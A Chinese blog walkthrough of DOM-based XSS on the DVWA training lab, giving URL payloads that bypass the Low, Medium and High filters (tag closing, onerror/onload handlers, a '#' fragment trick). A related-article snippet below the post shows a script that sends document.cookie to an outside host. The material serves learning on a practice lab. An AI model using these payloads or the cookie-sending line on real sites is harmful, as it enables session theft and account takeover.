DVWA DOM型XSS

最新推荐文章于 2023-12-24 17:25:02 发布
最新推荐文章于 2023-12-24 17:25:02 发布
阅读量376 收藏 2
点赞数
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scrawman/article/details/114187615
版权

前言

DVWA上的DOM型XSS与反射型和存储型XSS不同,页面上是没有输入的,所以要直接在URL上实施攻击

一、Low

low级别的代码什么防护都没有,因此直接输入URL:http://192.168.44.1/DVWA/vulnerabilities/xss_d/?default=<script>alert('xss')</script>

在这里插入图片描述

二、Medium

Medium级别的代码增加了检查机制,如果输入当中有“<script”就把default设为English阻止XSS注入。但我们可以通过插入其它语句来达到我们的目的。在这里插入图片描述
我们可以构造URL:
http://127.0.0.1/vulnerabilities/xss_d/?default= ></option></select><img src=1 οnerrοr=alert('xss')>
先闭合option再闭合select

在这里插入图片描述
如果页面上显示的是一张失败的图片但没有弹窗的话可以更换URL
http://127.0.0.1/vulnerabilities/xss_d/?default= ></option></select><svg/onload=alert(1)>或者
http://127.0.0.1/vulnerabilities/xss_d/?default= ></option></select><iframe src="javascript:alert(1)"></iframe>

在这里插入图片描述
查看页面源代码可以看到我们的代码已经插入进去了,闭合了select标签后执行在这里插入图片描述

三、High

High级别的代码用了一个switch表使我们只能提交规定的内容,但是#注释符可以让服务器端无视#后面的代码从而绕过检测。构造URL:http://192.168.44.1/DVWA/vulnerabilities/xss_d/?default=English#<script>alert(1)</script>
这样这段代码就是写在本地的,每次在下方重新选择language后都会触发这个XSS。而且这段代码不会像low和high一样保存在页面源代码里。

在这里插入图片描述
在这里插入图片描述

scrawman
关注
DVWA】--- 十一、DOMXSS(XSS DOM)
qq_43168364的博客
05-31 372
XSS DOM 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法
DVWA系列之XSS(跨站脚本攻击)——DOMXSS源码分析及漏洞利用
7Riven's blog
11-27 1469
DOMXSS Document Object Model 文本对象模xss、可能是存储也可能是反射、只决定于输出地方 在反射XSS中输入: <script>var img=document.createElement('img');img.src='http://192.168.232.130:88/log?'+escape(document.cookie);&...
DVWAXSS
谢公子的博客
08-05 1956
  XSS XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储XSS与反射XSSDOMXSS由于其特殊性,常...
DVWADOMXSS
qq_39682037的博客
03-19 2420
DOMXSS 是一种特殊类的反射XSS,它是基于DOM文档对象模的一种漏洞,其触发不需要经过服务器端,也就是说,服务端的防御并不起作用。 Security Level: low 源码 <?php # No protections, anything goes ?> 分析 什么限制都没有,大胆尝试 进行下方的实验 发现在url的default写什么页面便生成什...
DVWAXSSDOM
RexHa的博客
10-06 2091
dvwa XSSDOM
DVWA DOM-XSS
老司机开代码的博客
09-02 366
文章目录关于DOMlowmediumhighimpossible 关于DOM 因为自己还没有深入,系统的学习js和html。因此对于DOM的理解也不深入,就目前个人的认识,DOMXSS是利用浏览器访问DOM对象,修改网页html结构,从而达到xss注入。等以后详细的学习了,再把这个介绍补上。 这里推荐一篇有关DOM-XSS介绍的文章: DOM-XSS攻击原理与防御 low low级别,没有防护。 但是这里的输入框是一种选择类的框框,无法在输入框中构造payload。但是通过观察可以发现,输入框所选择
玩转DVWAXSS DOM
key01362000的博客
09-29 1082
DVWAXSS DOM攻击
通过DVWA学习DOMXSS
Mi1k7ea
01-02 4074
下了个新版的DVWA看了下,发现新增了好几个Web漏洞类,就玩一下顺便做下笔记,完善一下之前那篇很水的DOM XSS文章,虽然这个也很水 :) 基本概念 DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOMXSS其实是一种特殊类的反射XSS,它是基于DOM文档对象模的一种漏洞,其触...
DVWA-XSS(DOM)超详细_low级别适合小白入门
interfac的博客
01-19 423
前言 最近在学习XSS,环境使用的使DVWA,看到网上有很多大佬的有关文章总结自己在学习中的难点。 XSS简介 XSS(Cross Site Script),全称跨站脚本攻击,为了与 CSS(Cascading Style Sheet) 有所区别,所以在安全领域称为 XSSXSS 攻击,通常指黑客通过 HTML 注入 篡改网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击行为。 DOM—based XSS漏洞的产生 DOM—based XSS漏洞是基于文档对象模Documen
DVWA靶场XSS DOMLOW级别演示举例
最新发布
2301_77185537的博客
12-24 425
因此尝试修改URL中的default值,使它等于经典的XSS脚本payload网页弹窗。:因此我们查看网页前端的源代码,因为处理用户输入的只有前端的JavaScript代码。能够调出网页弹窗,也就能说明我们注入其他恶意的JavaScript代码也是没有问题的。:查看网站后台的PHP源代码,发现服务器端没有任何的PHP限制。:首先打开DVWA靶场XSS DOM 模块。靶场XSS DOM模块举例。
一、详解 DVWA_DOMXSS
在下小黄的博客
05-22 1662
第一篇,DVWA_DOMXSS详解
DVWA XSS DOM
m0_56107268的博客
04-30 1034
DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOMXSS其实是一种特殊类的反射XSS,它是基于DOM文档对象模的一种漏洞。 在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。也就是说,..
dvwa学习笔记——domxss
weixin_45082914的博客
08-18 486
三、domxss DOM xss是基于dom文档对象模,前端脚本通过dom动态修改页面,由于不与服务端进行交互,而且代码是可见的,从前端获取dom中的数据在本地执行。 常见的可以操纵dom的对象:URL,localtion,referrer等。 low源码: dvwa下的domxss页面的意思是选择一种语音,只在前端执行,且代码并未对default进行处理 漏洞分析与利用: 源码并未做任何安全防护措施,所以可以直接在url上构造攻击脚本 构造脚本: ...dvwa/vulnera
DVWA-DOM XSS
七月_的博客
10-25 792
文章目录DOM XSS (Low)代码分析漏洞利用DOM XSS(Medium)代码分析漏洞利用绕过DOM XSS(High)代码分析漏洞利用 DOM XSS (Low) vulnerabilities/xss_r/source/low.php 代码分析 无任何过滤 漏洞利用 输入,成功弹框: DOM XSS(Medium) 代码分析 漏洞利用 绕过 DOM XSS(High) 代码分析 漏...
DVWA - XSS DOM (low)
qq_42630215的博客
06-04 403
low级别 XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储XSS与反射XSSDOMXSS由于其特殊性,常常被分为第三种,这是一种基于DOM树的XSS。 可能触发DOMXSS的属性:document.referer 属性wi
DVWAXss跨站脚本攻击(DOM
AZK707的博客
03-17 1291
目录 DOM 一、初级 二、中级 三、高级 DOM 一、初级 1. DOMxss与前两个xss不同,在于没有可以用户输入的位置了,只有下拉菜单可以选择。当我们提交选项后,发现URL有显示,所以我们就通过URL拼接恶意代码 2. 1)方法一:将default后的English替换掉 <script>alert('zky50_test01')</script> 2)方法二: </option></sele...
DVWA----DOMXSS攻击演练---亲测(微笑)
weixin_44034479的博客
07-07 856
原理: XSS的中文名称叫跨站脚本,是WEB漏洞中比较常见的一种。 特点:就是可以将恶意HTML/JavaScript代码注入到受害用户浏览的网页上,从而达到劫持用户会话的目的。 XSS根据恶意脚本的传递方式可以分为3种,分别为反射、存储DOM,前面两种恶意脚本都会经过服务器端然后返回给客户端,而DOM不用将恶意脚本传输到服务器在返回客户端。 原理: DOMXSS就是基于DOM文档对象模的。对于浏览器来说,DOM文档就是一份XML文档,当有了这个标准的技术之后,通过JavaScript就可以轻
DVWAXSSDOM
ANDTM的博客
06-08 323
DOM就是一个树状的模,你可以编写Javascript代码根据dom一层一层的节点,去遍历/获取/修改对应的节点,对象,值。了解了这么一个知识点,你就会发现,其实dom xss并不复杂,他也属于反射xss的一种(domxss取决于输出位置,并不取决于输出环境,因此domxss既有可能是反射的,也有可能是存储的),简单去理解就是因为他输出点在DOMdom - xss是通过url传入参数去控制触发的)
[网络安全]DVWAXSS(DOM)攻击姿势及解题详析合集
热门推荐
等风来
05-16 1万+
源代码未进行任何过滤复选框中的内容为可变参数:这段 PHP 代码主要是用于处理 GET 请求中的 default 参数,它包含了以下几个功能: 1.判断是否有 default 参数:通过 array_key_exists() 函数来判断 $_GET 超级全局变量中是否存在名为 default 的键,如果存在并且不为 null,则将其赋值给 $default 变量。 2.防止 XSS 攻击:使用 stripos() 函数查找 $default 中是否包含
DVWA-XSS(DOM)
08-25
DVWA-XSS(DOM)是指DVWA靶机学习中的一种XSS攻击,它利用了DOM(文档对象模)中的漏洞。DOM是一个与平台、编程语言无关的接口,允许程序或脚本动态地访问和更新文档内容、结构和样式。而DVWA-XSS(DOM)攻击则是通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值